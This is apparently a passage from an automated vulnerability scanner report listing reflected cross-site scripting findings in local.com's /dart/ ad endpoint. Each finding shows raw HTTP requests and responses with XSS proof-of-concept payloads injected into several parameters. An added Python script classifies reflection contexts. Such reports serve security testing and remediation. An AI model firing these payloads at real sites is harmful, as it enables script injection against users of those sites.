Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

1.462. http://www.local.com/dart/ [p parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response excerpt below shows the reflection inside the double-quoted src attribute of a <script> tag (the DoubleClick adj URL), where an unescaped single quote does not by itself break out of the attribute; the confirmed breakout for the same parameter is the double-quote injection in issue 1.463.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.463. http://www.local.com/dart/ [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

1.464. http://www.local.com/dart/ [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

1.465. http://www.local.com/dart/ [pos parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the response excerpt below shows the reflection inside the double-quoted src attribute of a <script> tag (the DoubleClick adj URL), where an unescaped single quote does not by itself break out of the attribute; the confirmed breakout for the same parameter is the double-quote injection in issue 1.464 above.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.466. http://www.local.com/dart/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

1.467. http://www.local.com/dart/ [sz parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour shows that the single quote and semicolon survive unencoded, so a JavaScript string literal that receives this value could be terminated. The scanner found no full proof-of-concept for executing arbitrary JavaScript from this position, which is why the confidence is Firm rather than Certain. Check the context by hand before relying on this finding: the response snippet below places the echo inside the double-quoted src attribute of a script element, where a single quote closes nothing, whereas the preceding finding for the same sz parameter shows a double quote breaking out of an attribute value. Look for input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
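To check a Firm finding such as 1.467 without a browser, the following added example (it is not part of the CloudScan report and not code from local.com) re-runs the scanner's reflection test offline: it locates the random prefix and suffix in a response body, extracts what the application echoed between them, compares that with the submitted probe after one URL-decode, and classifies whether the echo sits in script code, inside a tag's attribute list, or in ordinary text. The two first sample bodies are the response lines quoted in this report; the third is a constructed `<script>` wrapper around the s.campaign line shown under finding 1.475. The context classifier is a deliberately simple heuristic of my own (it ignores HTML comments and `>` characters quoted inside attributes).

```python
import re
from urllib.parse import unquote


def find_echo(body: str, prefix: str, suffix: str):
    """Return what the application echoed between the random prefix and suffix
    markers, or None when the probe was not reflected at all."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None


def reflection_context(body: str, prefix: str) -> str:
    """Classify where the first echo landed by inspecting the markup before it:
    'script'    in the code of an open <script> element
    'attribute' inside a tag that was opened but not yet closed with '>'
    'text'      ordinary element content
    (assumed heuristic: ignores comments and quoted '>' inside attributes)"""
    idx = body.find(prefix)
    if idx == -1:
        return "none"
    head = body[:idx]
    lower = head.lower()
    open_script, close_script = lower.rfind("<script"), lower.rfind("</script")
    if open_script > close_script:
        # After the '>' of the opening tag we are in script code; before it we
        # are still among the <script ...> tag's attributes, e.g. its src=.
        return "script" if head.find(">", open_script) != -1 else "attribute"
    return "attribute" if head.rfind("<") > head.rfind(">") else "text"


def assess(body: str, prefix: str, probe: str, suffix: str, full_poc: bool):
    """Reproduce the report's confidence scale for one probe.
    certain : a complete proof-of-concept came back unmodified
    firm    : only a quote/terminator probe came back unmodified
    none    : not echoed, or the dangerous characters were altered"""
    echo = find_echo(body, prefix, suffix)
    if echo is None:
        return "none", None
    ctx = reflection_context(body, prefix)
    # The server URL-decodes the query string once before the application sees
    # it, so the probe is compared in its decoded form (9fc55'%3b... -> 9fc55';).
    if echo != unquote(probe):
        return "none", ctx
    return ("certain" if full_poc else "firm"), ctx


# Sample 1: the <script src=...> line quoted in the response under finding 1.467.
SCRIPT_SRC = ('<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;'
              'dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55\';14f61c68560;'
              'ord=1296748882748?" type="text/javascript">')
# Sample 2: the <a href=...> line quoted for the preceding sz finding.
ANCHOR_HREF = ('<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;'
               'tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"'
               'd187ae2a24b;ord=1296748882748?" target="_blank">')
# Sample 3: constructed wrapper around the s.campaign line quoted under finding 1.475.
SCRIPT_BODY = ('<script type="text/javascript">\n'
               's.campaign = "506d27c6";652d94a4b4b";\n'
               '</script>')


def demo() -> dict:
    return {
        "sz_terminator": assess(SCRIPT_SRC, "9fc55", "'%3b", "14f61c68560", full_poc=False),
        "sz_expression": assess(ANCHOR_HREF, "d243c",
                                '"style%3d"x%3aexpression(alert(1))"', "d187ae2a24b",
                                full_poc=True),
        "cid_terminator": assess(SCRIPT_BODY, "d27c6", '"%3b', "652d94a4b4b", full_poc=False),
    }


if __name__ == "__main__":
    for name, (confidence, context) in demo().items():
        print(f"{name}: {confidence} ({context})")
```

Running it reports the sz terminator probe as firm/attribute (the single quote is intact but sits in a double-quoted src attribute), the expression payload as certain/attribute, and the cid probe as firm/script, which is the combination worth chasing by hand first.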

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

1.468. http://www.local.com/dart/ [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to older versions of Internet Explorer and may not work in other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
